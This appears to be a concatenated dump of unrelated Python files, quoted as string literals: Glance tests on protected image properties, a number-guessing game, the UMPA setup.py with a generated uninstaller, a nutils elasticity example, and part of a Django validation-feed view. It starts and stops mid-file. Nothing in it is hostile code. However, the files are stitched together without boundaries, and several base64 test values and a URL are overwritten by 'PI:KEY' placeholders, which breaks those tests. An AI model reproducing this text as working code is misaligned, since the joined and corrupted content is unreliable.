self.assertEqual(res_body[\'properties\'][\'spl_update_prop\'], \'1\')\n self.assertNotIn(\'foo\', res_body[\'properties\'])\n\n def test_update_protected_props_mix_no_read(self):\n """"""\n Create an image with two props - one only readable by admin, and one\n readable/updatable by member. Verify member can successfully update\n their property while the admin owned one is ignored transparently\n """"""\n image_id = self._create_admin_image(\n {\'x-image-meta-property-admin_foo\': \'bar\',\n \'x-image-meta-property-x_owner_foo\': \'bar\'})\n another_request = unit_test_utils.get_fake_request(\n path=\'/images/%s\' % image_id, method=\'PUT\')\n headers = {\'x-auth-token\': \'user:tenant:member\',\n \'x-image-meta-property-x_owner_foo\': \'baz\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n output = another_request.get_response(self.api)\n res_body = json.loads(output.body)[\'image\']\n self.assertEqual(res_body[\'properties\'][\'x_owner_foo\'], \'baz\')\n self.assertNotIn(\'admin_foo\', res_body[\'properties\'])\n\n def test_update_protected_props_mix_read(self):\n """"""\n Create an image with two props - one readable/updatable by admin, but\n also readable by spl_role. The other is readable/updatable by\n spl_role. 
Verify spl_role can successfully update their property but\n not the admin owned one\n """"""\n custom_props = {\n \'x-image-meta-property-spl_read_only_prop\': \'1\',\n \'x-image-meta-property-spl_update_prop\': \'2\'\n }\n image_id = self._create_admin_image(custom_props)\n another_request = unit_test_utils.get_fake_request(\n path=\'/images/%s\' % image_id, method=\'PUT\')\n\n # verify spl_role can update its prop\n headers = {\'x-auth-token\': \'user:tenant:spl_role\',\n \'x-image-meta-property-spl_read_only_prop\': \'1\',\n \'x-image-meta-property-spl_update_prop\': \'1\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n output = another_request.get_response(self.api)\n res_body = json.loads(output.body)[\'image\']\n self.assertEqual(output.status_int, 200)\n self.assertEqual(res_body[\'properties\'][\'spl_read_only_prop\'], \'1\')\n self.assertEqual(res_body[\'properties\'][\'spl_update_prop\'], \'1\')\n\n # verify spl_role can not update admin controlled prop\n headers = {\'x-auth-token\': \'user:tenant:spl_role\',\n \'x-image-meta-property-spl_read_only_prop\': \'2\',\n \'x-image-meta-property-spl_update_prop\': \'1\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n output = another_request.get_response(self.api)\n self.assertEqual(output.status_int, 403)\n\n def test_delete_protected_props_mix_no_read(self):\n """"""\n Create an image with two props - one only readable by admin, and one\n readable/deletable by member. Verify member can successfully delete\n their property while the admin owned one is ignored transparently\n """"""\n image_id = self._create_admin_image(\n {\'x-image-meta-property-admin_foo\': \'bar\',\n \'x-image-meta-property-x_owner_foo\': \'bar\'})\n another_request = unit_test_utils.get_fake_request(\n path=\'/images/%s\' % image_id, method=\'PUT\')\n headers = {\'x-auth-token\': \'user:tenant:member\',\n \'X-Glance-Registry-Purge-Props\': \'True\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n output = another_request.get_response(self.api)\n res_body = json.loads(output.body)[\'image\']\n self.assertNotIn(\'x_owner_foo\', res_body[\'properties\'])\n self.assertNotIn(\'admin_foo\', res_body[\'properties\'])\n\n def test_delete_protected_props_mix_read(self):\n """"""\n Create an image with two props - one readable/deletable by admin, but\n also readable by spl_role. The other is readable/deletable by\n spl_role. 
Verify spl_role is forbidden to purge_props in this scenario\n without retaining the readable prop.\n """"""\n custom_props = {\n \'x-image-meta-property-spl_read_only_prop\': \'1\',\n \'x-image-meta-property-spl_delete_prop\': \'2\'\n }\n image_id = self._create_admin_image(custom_props)\n another_request = unit_test_utils.get_fake_request(\n path=\'/images/%s\' % image_id, method=\'PUT\')\n headers = {\'x-auth-token\': \'user:tenant:spl_role\',\n \'X-Glance-Registry-Purge-Props\': \'True\'}\n for k, v in headers.iteritems():\n another_request.headers[k] = v\n output = another_request.get_response(self.api)\n self.assertEqual(output.status_int, 403)\n', '#!/usr/bin/python\n# version 4\n# april 2012 \n# this was written by saikia81 and is copyrighted under the GNU general public license 3\n# it was written in notepad++, a program I recommend!\n# whitespace ftw!\n\n\n#import random, system and operating system possibilities.\nimport os, sys\nimport random, time #time moduele\n#pickling for data2file\nimport cPickle as pickle\n\n\n#introducing the player\ndef instructions():\n print \'welcome to the guess my number game V4\'\n print ""I\'ll think of a number and you have to guess it\\n""\n\n#making a list of all possible numbers for every dificulty\ndef list_numbers():\n list_easy = []\n list_medium = []\n list_hard = []\n for n in range(1,101):\n list_easy.append(n)\n list_medium.append(n)\n list_hard.append(n)\n for n in range(101,201):\n list_medium.append(n)\n list_hard.append(n)\n for n in range(-201,0):\n n += 1\n list_hard.append(n)\n return list_easy, list_medium, list_hard\n\n\n#does the player want to change the dificulty\ndef change_dificulty(dificulty):\n if dificulty == None:\n dificulty = choose_dificulty()\n return dificulty\n if raw_input(""do you want to change dificulty? yes/no: "") == \'yes\':\n dificulty = choose_dificulty()\n return dificulty\n else:\n return dificulty\n \n\n#the dificulty the player wants to choose\ndef choose_dificulty():\n print \'\\nwhat dificulty do you want to play in?\'\n dificulty = raw_input(\'choose between ""easy"", ""medium"" or ""hard"":\\n\') \n dificulties = \'easy\', \'medium\', \'hard\'\n #if anybody tries to be smart: help them get it right\n wrong = -1\n if dificulty in dificulties: wrong = 0\n elif dificulty not in dificulties:\n wrong += 1 \n for n in (1,2,3):\n if n == 3:\n print ""\\nseems like you can\'t handle choosing a dificulty...""\n dificulty = ""easy""\n time.sleep(2)\n print """"\n elif (dificulty not in dificulties):\n print \'something went wrong!!! please try again\\n\'\n dificulty = raw_input(\'choose between ""easy"", ""medium"" or ""hard"":\\n\')\n wrong += 1\n elif dificulty in dificulties:\n print ""\\nalright so let\'s get started :D\\n""\n break\n else:\n print ""you\'re doing something wrong! 
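list_numbers() builds three overlapping lists by hand; together with random_number() further down they encode one small table: easy is 1..100, medium 1..200, hard -200..200. The same mapping can be read at a glance from a dict (a compact alternative sketch, not the original author's code):

```python
import random

RANGES = {'easy': (1, 100), 'medium': (1, 200), 'hard': (-200, 200)}

def pick_number(dificulty):
    # Returns the secret number plus the list of valid guesses,
    # mirroring what list_numbers() and random_number() produce.
    lo, hi = RANGES[dificulty]
    return random.randint(lo, hi), list(range(lo, hi + 1))

number, numbers = pick_number('hard')
assert -200 <= number <= 200 and len(numbers) == 401
```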
I\'ll choose a dificulty for you\\a\\a\\a\\a\\n""\n dificulty = \'easy\'\n print ""ERROR: 008""\n time.sleep(2)\n else:\n print \'\\a\\a\\asomething went wrong the program will shutdown.\'\n print ""ERROR: 009""\n time.sleep(2.5)\n sys.exit()\n return dificulty\n\n#so here a random number will be chosen depending on the dificulty\ndef random_number(dificulty, list_easy, list_medium, list_hard):\n if dificulty == \'easy\':\n NUMBER = random.randrange(100) + 1\n print ""you have chosen the dificulty easy.""\n number_range = \'1 and 100: \'\n numbers = list_easy\n elif dificulty == \'medium\':\n NUMBER = random.randrange(200) + 1\n print ""you have chosen the dificulty medium.""\n number_range = \'1 and 200: \'\n numbers = list_medium\n elif dificulty == \'hard\':\n NUMBER = random.randrange(-200,201)\n print ""you have chosen the dificulty hard.""\n number_range = \'-200 and 200: \'\n numbers = list_hard\n else:\n print ""dificulty malfunction""\n print ""ERROR: 003""\n time.sleep(2.5)\n exit()\n return NUMBER, number_range, numbers\n\n# if the guess != ""the (predefined) number"": loop.\ndef game(dificulty, NUMBER, number_range, numbers):\n time.sleep(2.5)\n os.system(\'cls\')\n guesses=0\n guess=\'nothing\'\n while guess != NUMBER:\n if guess == \'nothing\':\n print \'guess a number between\', number_range\n try:\n guess = input()\n except:\n print ""\\nsomething went wrong\\nyou\'re getting another try\\n\\n""\n continue\n guesses += 1\n elif guess == \'cheater\':\n guess = NUMBER\n elif guess not in numbers:\n print ""\\nthe guess you made isn\'t in the range of valid numbers.\\nAre you sure you want to make this guess?""\n answ = raw_input(""\'yes\'/\'no\' \\n"")\n if answ == \'yes\':\n print ""it\'s your funeral""\n print \'\\nguess a number between\', number_range\n #accept a fresh guess so the loop can progress\n try:\n guess = input()\n except:\n print ""something went wrong\\nyou\'re getting another try\\n""\n continue\n guesses += 1\n elif answ == \'no\':\n print ""good choice""\n print \'\\nguess a number between\', number_range\n try:\n guess = input()\n except:\n print ""something went wrong\\nyou\'re getting another try\\n""\n continue\n else:\n print ""that isn\'t a valid option""\n print ""let\'s continue\\n""\n #if the number is higher than the guess\n elif guess < NUMBER:\n print \'higher...\'\n print \'\\nguess a number between\', number_range\n try:\n guess = input()\n except:\n print ""something went wrong\\nyou\'re getting another try\\n""\n continue\n guesses += 1\n continue\n #if the number is \'lower...\'\n elif guess > NUMBER:\n print \'lower...\' \n print \'\\nguess a number between\', number_range\n try:\n guess = input()\n except:\n print ""something went wrong\\n you\'ll get another try""\n continue\n guesses += 1\n #this is actually an error that will never occur... but better safe than sorry.\n else:\n print \'\\a\\a\\asorry, something went wrong. 
The game will now end itself.\'\n sys.exit()\n print\n print \'you did it, the NUMBER was: \', NUMBER,\n print \'it cost you \', guesses, \'guesses to get it right\', \'on dificulty\', dificulty\n print\n return guesses\n\n##Here I will use the \'os\' module to keep a highscore system\n#in the default appdata of the user\'s profile.\n#everything here is to see if everything is alright in its place.\ndef highscore(dificulty,guesses):\n FOLDER_LOCALAPPDATA = os.environ[\'LOCALAPPDATA\']\n FOLDER_NUMBER_GAME = FOLDER_LOCALAPPDATA + \'\\\\Number_game\'\n #deciding if a new highscore file and/or dir is needed\n if os.access(FOLDER_NUMBER_GAME, 0) == False: #dir\n try:\n os.mkdir(FOLDER_NUMBER_GAME)\n except:\n os.system(\'cls\')\n print \'creating folder: ERROR\\nError code: 002\'\n os.system(\'pause\')\n sys.exit()\n try:\n HIGHSCORES_DAT = open(FOLDER_NUMBER_GAME+""\\\\highscores.dat"", ""w+"")\n easy_highscores={}\n medium_highscores={}\n hard_highscores={}\n all_highscores = [easy_highscores,medium_highscores,hard_highscores]\n pickle.dump(all_highscores,HIGHSCORES_DAT)\n HIGHSCORES_DAT.close()\n HIGHSCORES_DAT = open(FOLDER_NUMBER_GAME+""\\\\highscores.dat"", ""r+"")\n unpickled_file = pickle.load(HIGHSCORES_DAT)\n \n except:\n os.system(\'cls\')\n print \'loading file: ERROR\\nError code: 001\'\n os.system(\'pause\')\n sys.exit()\n else:\n HIGHSCORES_DAT.close()\n \n \n #done with file and folder creation\n #\n #showing highscores\n \n HIGHSCORES_DAT = open(FOLDER_NUMBER_GAME+""\\\\highscores.dat"", ""r"") \n try:\n unpickled_file = pickle.load(HIGHSCORES_DAT)\n except:\n print ""couldn\'t locate or unpickle file""\n print ""ERROR: 005""\n print ""\\n if this was your first run of the game: this is common""\n print ""if not, please send a message at dummy@email.com, thank you""\n time.sleep(1)\n print ""everything went worse than expected. 
shutting down""\n time.sleep(2.5)\n sys.exit()\n \n else:\n HIGHSCORES_DAT.close()\n\n if dificulty == ""easy"": l=0\n if dificulty == ""medium"": l=1\n if dificulty == ""hard"": l=2\n highscores = unpickled_file[l]\n \n #creating your highscore...\n your_name = raw_input(\'what is your name?: \')\n try:\n if highscores[your_name]>guesses:\n os.system(\'cls\')\n print ""congratulations, new highscore!!""\n if raw_input(\'do you want to replace your score yes/no: \') ==""yes"": highscores[your_name]=guesses\n except:\n print ""new user""\n highscores[your_name]=guesses\n \n list_keys= highscores.keys()\n list_values= highscores.values()\n\n list_values.sort()\n \n time.sleep(4)\n os.system(\'cls\') \n #deeply annoying part\n #highscore display\n print"" ---HIGHSCORE---""\n print ""highscores in"", dificulty,""dificulty""\n print""\\nname attempts""\n print""----------------------------------------""\n i=0\n #for values in sorted values list\n for n in list_values:\n #reset found to find next highscore\n found = False\n #set p to 0: to try different keys\n p=0\n #while the matching key and value not found keep looking\n while found != True:\n #m = the next key in list\n m=list_keys[p]\n if highscores[m] == n: found=True\n p+=1\n b=len(m)\n b=21-b\n print m,\' \'*b,highscores[m]\n \n HIGHSCORES_DAT = open(FOLDER_NUMBER_GAME+""\\\\highscores.dat"", ""r"")\n unpickled_file = pickle.load(HIGHSCORES_DAT)\n HIGHSCORES_DAT.close()\n if l==0: unpickled_file[0]=highscores\n if l==1: unpickled_file[1]=highscores\n if l==2: unpickled_file[2]=highscores\n HIGHSCORES_DAT = open(FOLDER_NUMBER_GAME+""\\\\highscores.dat"", ""w"")\n pickle.dump(unpickled_file,HIGHSCORES_DAT)\n HIGHSCORES_DAT.close()\n\ndef end():\n time.sleep(1)\n print(\'\'\'\n The number Game V4\n Copyright (C) 2012 Saikia81\n \'\'\')\n time.sleep(5)\n os.system(\'cls\')\n print(""""""\n This program is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with this program. If not, see .\n """""")\n time.sleep(7)\n try:\n if pygame.mixer.get_busy()>0:\n try:\n pygame.mixer.music.fadeout(3000)\n except:\n print ""ERROR: 012""\n except:\n pass\n time.sleep(3)\n os.system(\'pause\')\n sys.exit()\n\ndef main():\n #initializing\n ask_music = raw_input(\'music ""on""?: \')\n if (ask_music == \'on\') or (ask_music == \'yes\'):\n try:\n import pygame.mixer\n pygame.mixer.init()\n pygame.mixer.music.load(""song.mp3"")\n pygame.mixer.music.play(-1)\n except:\n print ""pygame not working!\\nError: 013""\n os.system(\'cls\')\n list_easy, list_medium, list_hard = list_numbers()\n dificulty = None\n instructions()\n while 1:\n dificulty=change_dificulty(dificulty)\n NUMBER, number_range, numbers = random_number(dificulty, list_easy, list_medium, list_hard)\n guesses = game(dificulty, NUMBER, number_range, numbers)\n highscore(dificulty,guesses)\n\n ask_again = raw_input(\'\\ndo you want to play again? 
yes/no: \')\n os.system(\'cls\')\n if ask_again == \'no\': end()\n\n#start\nmain()\n', '#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Copyright (C) 2008-2009 Adriano Monteiro Marques.\n#\n# Author: Bartosz SKOWRON \n#\n# This library is free software; you can redistribute it and/or modify \n# it under the terms of the GNU Lesser General Public License as published \n# by the Free Software Foundation; either version 2.1 of the License, or \n# (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful, but \n# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY\n# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public \n# License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License \n# along with this library; if not, write to the Free Software Foundation, \n# Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA \n\nimport glob\nimport os\nimport os.path\nfrom stat import ST_MODE\nfrom distutils.core import setup\nfrom distutils.command.install import install\n\nUMPA_VERSION = \'0.2\'\nSHARE_DIR = os.path.join(\'share\', \'umpa\')\nDOCS_DIR = os.path.join(\'share\', \'doc\', \'umpa\')\n\nTESTS_DIR = [\n os.path.join(\'tests\'),\n os.path.join(\'tests\', \'system\'),\n os.path.join(\'tests\', \'system\', \'test_snd\'),\n os.path.join(\'tests\', \'system\', \'test_sndrcv\'),\n os.path.join(\'tests\', \'a_unit\'),\n os.path.join(\'tests\', \'a_unit\', \'test_extensions\'),\n os.path.join(\'tests\', \'a_unit\', \'test_protocols\'),\n os.path.join(\'tests\', \'a_unit\', \'test_utils\'),\n os.path.join(\'tests\', \'a_unit\', \'test_sniffing\'),\n os.path.join(\'tests\', \'a_unit\', \'test_sniffing\', \'test_libpcap\'),\n]\n\nclass umpa_install(install):\n def run(self):\n install.run(self)\n self.create_uninstaller()\n\n def create_uninstaller(self):\n uninstaller_filename = os.path.join(\n self.install_data, SHARE_DIR, \'uninstall_umpa\')\n uninstaller = []\n uninstaller.append(\n ""#!/usr/bin/env python\\n""\n ""import os, sys, shutil\\n""\n ""\\n""\n ""print\\n""\n ""print \'%(line)s Uninstall UMPA %(version)s %(line)s\'\\n""\n ""print\\n""\n ""\\n""\n ""answer = raw_input(\'Are you sure that you want to \'\\n""\n "" \'completely uninstall UMPA %(version)s? (yes/no) \')\\n""\n ""\\n""\n ""if answer.lower() not in [\'yes\', \'y\']:\\n""\n "" sys.exit(0)\\n""\n ""\\n""\n ""print\\n""\n ""print \'%(line)s Uninstalling UMPA %(version)s... 
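create_uninstaller() writes a freestanding Python script that removes every path distutils recorded via get_outputs(), then flips the execute bits with the octal dance `(mode | 0555) & 07777` visible just below. The same chmod in modern syntax, for reference (Python 3 octal literals; a sketch, not part of this setup.py):

```python
import os

def make_executable(path):
    # Equivalent of `chmod a+rx` while preserving the other mode bits:
    # 0o555 adds read+execute for user/group/other, and masking with
    # 0o7777 keeps only the permission bits.
    mode = os.stat(path).st_mode
    os.chmod(path, (mode | 0o555) & 0o7777)
```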
%(line)s\'\\n""\n ""print\\n"" % {\'version\': UMPA_VERSION, \'line\': \'-\' * 10})\n\n for output in self.get_outputs():\n uninstaller.append(\n \'print ""Removing %(output)s...""\\n\'\n \'if os.path.exists(""%(output)s""):\\n\'\n \' os.remove(""%(output)s"")\\n\' % {\'output\': output})\n\n uninstaller.append(\n ""print \'Removing uninstaller itself...\'\\n""\n ""os.remove(\'%s\')\\n"" % uninstaller_filename)\n\n uninstaller.append(\'print ""Removing empty directories...""\\n\')\n for dir in (\n os.path.join(self.install_data, SHARE_DIR),\n os.path.join(self.install_data, DOCS_DIR),\n os.path.join(self.install_lib, \'umpa\'),\n ):\n uninstaller.append(\n \'if os.path.exists(""%(dir)s""):\\n\'\n \' shutil.rmtree(""%(dir)s"")\\n\' % {\'dir\' : dir})\n\n uninstaller_file = open(uninstaller_filename, \'w\')\n uninstaller_file.writelines(uninstaller)\n uninstaller_file.close()\n\n # Set exec bit for uninstaller\n mode = ((os.stat(uninstaller_filename)[ST_MODE]) | 0555) & 07777\n os.chmod(uninstaller_filename, mode)\n\ncmdclasses = {\n \'install\' : umpa_install,\n }\n\ntest_files = []\nfor dir in TESTS_DIR:\n test_files = test_files + [ (os.path.join(SHARE_DIR, dir),\n glob.glob(os.path.join(dir,\'*.py\')))]\n\ndata_files = [ (os.path.join(SHARE_DIR,\'examples\'),\n glob.glob(os.path.join(\'examples\',\'*\'))),\n (os.path.join(DOCS_DIR,\'API\'),\n glob.glob(os.path.join(\'docs\',\'API\',\'*\'))),\n (os.path.join(DOCS_DIR,\'tutorials\',\'_sources\'),\n glob.glob(os.path.join(\'docs\',\'tutorials\',\'_sources\',\'*\'))),\n (os.path.join(DOCS_DIR,\'tutorials\',\'_static\'),\n glob.glob(os.path.join(\'docs\',\'tutorials\',\'_static\',\'*\'))),\n (os.path.join(DOCS_DIR,\'tutorials\'),\n glob.glob(os.path.join(\'docs\',\'tutorials\',\'*.*\'))),\n (SHARE_DIR, (\'run_tests.sh\', \'run_tests.bat\')),\n (DOCS_DIR,\n (\'README\', \'COPYING\', \'AUTHORS\', \'TODO\', \'CHANGES\',\n \'INSTALL\')),\n (os.path.join(SHARE_DIR, \'tests\'),\n (os.path.join(\'tests\',\'README\'),\n os.path.join(\'tests\',\'IMPORTANT\'))),\n ] + test_files\n\nsetup( name = ""UMPA"",\n version = UMPA_VERSION,\n description = ""Umit\'s Manipulations of Packets Art"",\n author = ""Bartosz SKOWRON"",\n author_email = dummy@email.com"",\n url = ""http://www.umpa.umitproject.org"",\n license = ""GNU LGPLv2"",\n platforms = [""Platform Independent""],\n packages = [ ""umit"",\n ""umit.umpa"",\n ""umit.umpa.protocols"",\n ""umit.umpa.sniffing"",\n ""umit.umpa.sniffing.libpcap"",\n ""umit.umpa.extensions"",\n ""umit.umpa.utils"",\n ],\n data_files = data_files,\n cmdclass = cmdclasses,\n)\n', ""#! /usr/bin/env python3\n#\n# In this script we solve the linear elasticity problem on a unit square\n# domain, clamped at the left boundary, and stretched at the right boundary\n# while keeping vertical displacements free.\n\nfrom nutils import mesh, function, solver, export, cli, testing\n\ndef main(nelems:int, etype:str, btype:str, degree:int, poisson:float):\n '''\n Horizontally loaded linear elastic plate.\n\n .. 
arguments::\n\n nelems [10]\n Number of elements along edge.\n etype [square]\n Type of elements (square/triangle/mixed).\n btype [std]\n Type of basis function (std/spline), with availability depending on the\n configured element type.\n degree [1]\n Polynomial degree.\n poisson [.25]\n Poisson's ratio, nonnegative and strictly smaller than 1/2.\n '''\n\n domain, geom = mesh.unitsquare(nelems, etype)\n\n ns = function.Namespace()\n ns.x = geom\n ns.basis = domain.basis(btype, degree=degree).vector(2)\n ns.u_i = 'basis_ni ?lhs_n'\n ns.X_i = 'x_i + u_i'\n ns.lmbda = 2 * poisson\n ns.mu = 1 - 2 * poisson\n ns.strain_ij = '(d(u_i, x_j) + d(u_j, x_i)) / 2'\n ns.stress_ij = 'lmbda strain_kk δ_ij + 2 mu strain_ij'\n\n sqr = domain.boundary['left'].integral('u_k u_k J(x)' @ ns, degree=degree*2)\n sqr += domain.boundary['right'].integral('(u_0 - .5)^2 J(x)' @ ns, degree=degree*2)\n cons = solver.optimize('lhs', sqr, droptol=1e-15)\n\n res = domain.integral('d(basis_ni, x_j) stress_ij J(x)' @ ns, degree=degree*2)\n lhs = solver.solve_linear('lhs', res, constrain=cons)\n\n bezier = domain.sample('bezier', 5)\n X, sxy = bezier.eval(['X', 'stress_01'] @ ns, lhs=lhs)\n export.triplot('shear.png', X, sxy, tri=bezier.tri, hull=bezier.hull)\n\n return cons, lhs\n\n# If the script is executed (as opposed to imported), :func:`nutils.cli.run`\n# calls the main function with arguments provided from the command line. For\n# example, to keep with the default arguments simply run :sh:`python3\n# elasticity.py`. To select mixed elements and quadratic basis functions add\n# :sh:`python3 elasticity.py etype=mixed degree=2`.\n\nif __name__ == '__main__':\n cli.run(main)\n\n# Once a simulation is developed and tested, it is good practice to save a few\n# strategic return values for regression testing. 
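# --- Aside: the namespace above appears to use a normalized lmbda/mu
# pair tied to the Poisson ratio alone. For physical units the Lame
# parameters are usually derived from Young's modulus E and Poisson's
# ratio nu; a minimal sketch of that textbook conversion:
def lame_parameters(E, nu):
    '''Return (lmbda, mu) for 3D / plane-strain linear elasticity.'''
    lmbda = E * nu / ((1 + nu) * (1 - 2 * nu))
    mu = E / (2 * (1 + nu))
    return lmbda, mu

# e.g. steel-like values: lame_parameters(210e9, 0.3)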
The :mod:`nutils.testing`\n# module, which builds on the standard :mod:`unittest` framework, facilitates\n# this by providing :func:`nutils.testing.TestCase.assertAlmostEqual64` for the\n# embedding of desired results as compressed base64 data.\n\nclass test(testing.TestCase):\n\n @testing.requires('matplotlib')\n def test_default(self):\n cons, lhs = main(nelems=4, etype='square', btype='std', degree=1, poisson=.25)\n with self.subTest('constraints'): self.assertAlmostEqual64(cons, '''\n eNpjYMACGsiHP0wxMQBKlBdi''')\n with self.subTest('left-hand side'): self.assertAlmostEqual64(lhs, '''\n eNpjYMAEKcaiRmLGQQZCxgwMYsbrzqcYvz672KTMaIKJimG7CQPDBJM75xabdJ3NMO0xSjG1MUw0Beox\n PXIuw7Tk7A/TXqMfQLEfQLEfQLEfpsVnAUzzHtI=''')\n\n @testing.requires('matplotlib')\n def test_mixed(self):\n cons, lhs = main(nelems=4, etype='mixed', btype='std', degree=1, poisson=.25)\n with self.subTest('constraints'): self.assertAlmostEqual64(cons, '''\n eNpjYICCBiiEsdFpIuEPU0wMAG6UF2I=''')\n with self.subTest('left-hand side'): self.assertAlmostEqual64(lhs, '''\n PI:KEY\n PI:KEY''')\n\n @testing.requires('matplotlib')\n def test_quadratic(self):\n cons, lhs = main(nelems=4, etype='square', btype='std', degree=2, poisson=.25)\n with self.subTest('constraints'): self.assertAlmostEqual64(cons, '''\n eNpjYCACNIxc+MOUMAYA/+NOFg==''')\n with self.subTest('left-hand side'): self.assertAlmostEqual64(lhs, '''\n eNqFzLPI:KEY\n PI:KEY\n PI:KEY\n PI:KEY\n PI:KEY''')\n\n @testing.requires('matplotlib')\n def test_poisson(self):\n cons, lhs = main(nelems=4, etype='square', btype='std', degree=1, poisson=.4)\n with self.subTest('constraints'): self.assertAlmostEqual64(cons, '''\n eNpjYMACGsiHP0wxMQBKlBdi''')\n with self.subTest('left-hand side'): self.assertAlmostEqual64(lhs, '''\n eNpjYMAEFsaTjdcYvTFcasTAsMZI5JyFce6ZKSavjbNMFhhFmDAwZJkknJ1iInom0ZTJJNx0q1GgKQND\n uKn32UTTf6d/mLKY/DDdZvQDKPbD1OvsD9M/pwGZyh9l''')\n"", 'import json\nimport random\nimport datetime\n\nfrom codalib import APP_AUTHOR\nfrom codalib.bagatom import wrapAtom, makeObjectFeed\nfrom dateutil import parser\nfrom django.conf import settings\nfrom django.contrib.sites.models import Site\nfrom django.contrib.syndication.views import Feed\nfrom django.core.paginator import Paginator\nfrom django.http import HttpResponse, HttpResponseNotFound\nfrom django.shortcuts import get_object_or_404, render\nfrom django.utils.feedgenerator import Atom1Feed\nfrom lxml import etree\n\nfrom django.views.generic import ListView\n\nfrom .models import Validate\n\n\nXML_HEADER = b""\\n%s""\n\n\nclass CorrectMimeTypeFeed(Atom1Feed):\n mime_type = \'application/xml\'\n\n\nclass AtomNextNewsFeed(Feed):\n """"""\n next view.\n an atom pub representation of the next validation to occur.\n should be a single item.\n """"""\n\n feed_type = Atom1Feed\n link = ""/validate/next/""\n title = ""UNT Coda Validate App""\n subtitle = ""The highest priority validation item""\n reason = \'None\'\n author_name = APP_AUTHOR.get(\'name\', None)\n author_link = APP_AUTHOR.get(\'uri\', None)\n feed_type = CorrectMimeTypeFeed\n\n def get_object(self, request, server):\n if server:\n return server\n else:\n return None\n\n def items(self, obj):\n # need to filter by server first, if provided\n reason = \'\'\n if obj:\n validations = Validate.objects.all().filter(server=obj)\n reason = \'This selection was filtered to only consider \\\n server %s. 
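# --- Aside: a hedged, standalone version of the random-offset idiom the
# comment above recommends over ORDER BY ? (which forces a full-table
# sort on MySQL). Works on any Django queryset `qs`:
import random

def random_tail(qs):
    n = qs.count()
    if n == 0:
        return qs.none()
    return qs[random.randrange(n):]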
\' % obj\n else:\n validations = Validate.objects.all()\n # next check if we have any with a priority above 0\n v = validations.filter(\n priority__gt=0).order_by(\'priority_change_date\')\n if v.exists():\n reason += \'Item was chosen because it is the \\\noldest prioritized.\'\n # if set is empty, go with any priority with last_verified older than\n # settings.VALIDATION_PERIOD\n else:\n # It might seem natural to use django\'s built-in random ordering,\n # but that technique becomes slow when using large sets\n # because \'order by ?\' is very expensive against MySQL dbs.\n # v = Validate.objects.all().filter(\n # last_verified__gte=datetime.datetime.now() -\n # settings.VALIDATION_PERIOD\n # ).order_by(\'?\')\n # instead, let\'s do this:\n # http://elpenia.wordpress.PI:KEY\n now = datetime.datetime.now()\n v = validations.filter(\n last_verified__lte=now - settings.VALIDATION_PERIOD\n )\n if v.exists():\n random_slice = int(random.random() * v.count())\n v = v[random_slice:]\n reason += \'Item was randomly selected and within the \\\npast year because there is no prioritized record.\'\n # if that set has no objects, pick the oldest verified item.\n else:\n v = validations.order_by(\'last_verified\')\n reason += \'Item was chosen because there \\\nis no prioritized record and it had not been validated in the longest \\\nduration of time.\'\n self.reason = reason\n return v[:1]\n\n def item_title(self, item):\n return item.identifier\n\n def item_description(self, item):\n return self.reason\n\n def item_link(self, item):\n return \'/APP/validate/%s/\' % item.identifier\n\n\n# for some reason, I couldn\'t get AtomNextFeed to work without a server\n# I don\'t think optional arguments are supported for class-based syndication\n# feeds, so I have this work around to make it work.\nclass AtomNextFeedNoServer(AtomNextNewsFeed):\n def get_object(self, request):\n pass\n\n\ndef index(request):\n context = {\n \'recently_prioritized\': Validate.objects.filter(\n priority__gt=0).order_by(\'-priority_change_date\')[:20],\n \'recently_verified\': Validate.objects.all().order_by(\'-last_verified\')[:20],\n \'verified_counts\': Validate.objects.last_verified_status_counts()\n }\n\n return render(request, \'coda_validate/index.html\', context)\n\n\ndef last_day_of_month(year, month):\n """""" Work out the last day of the month """"""\n last_days = [31, 30, 29, 28, 27]\n for i in last_days:\n try:\n end = datetime.datetime(year, month, i)\n except ValueError:\n continue\n else:\n return end.day\n return None\n\n\ndef stats(request):\n """"""\n stats page\n """"""\n if not Validate.objects.exists():\n return render(\n request,\n \'coda_validate/stats.html\',\n {\n \'sums_by_date\': {},\n \'validations\': None,\n \'this_month\': None,\n \'last_24h\': None,\n \'last_vp\': None,\n \'unverified\': 0,\n \'passed\': 0,\n \'failed\': 0,\n \'validation_period\': \'%s days\' % str(\n settings.VALIDATION_PERIOD.days\n ),\n }\n )\n # resolve the range for last month filter\n today = datetime.date.today()\n first = datetime.date(day=1, month=today.month, year=today.year)\n last_day = last_day_of_month(first.year, first.month)\n this_month_range = [\n \'%s-%s-01 00:00:00\' % (first.year, first.month),\n \'%s-%s-%s 23:59:59\' % (first.year, first.month, last_day),\n ]\n # resolve the range for last 24 hours filter\n now = datetime.datetime.now()\n twenty_four_hours_ago = now - datetime.timedelta(hours=24)\n since_validation_period = now - datetime.timedelta(\n days=settings.VALIDATION_PERIOD.days)\n # make a set of 
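# --- Aside: last_day_of_month() above probes candidate day numbers until
# datetime accepts one. The standard library already knows month lengths;
# a drop-in equivalent with the same signature and return value:
import calendar

def last_day_of_month(year, month):
    return calendar.monthrange(year, month)[1]  # (weekday, ndays)[1]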
